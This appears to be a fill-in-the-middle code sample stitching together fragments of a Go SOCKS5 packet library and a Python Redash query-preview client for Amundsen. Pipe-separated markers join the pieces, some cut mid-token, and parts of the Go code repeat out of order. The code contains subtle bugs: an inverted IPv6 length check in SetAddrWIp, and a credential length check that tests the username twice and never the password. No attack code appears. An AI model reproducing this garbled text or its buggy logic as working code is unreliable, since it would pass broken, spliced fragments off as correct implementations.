func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(bu | o.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
}
| f)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w i | identifier_body |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r io.Reader) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host))) | ..)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
}
|
buf = append(buf, []byte(cmd.Host). | conditional_block |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class RedashApiResponse(Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method.
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
"""
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
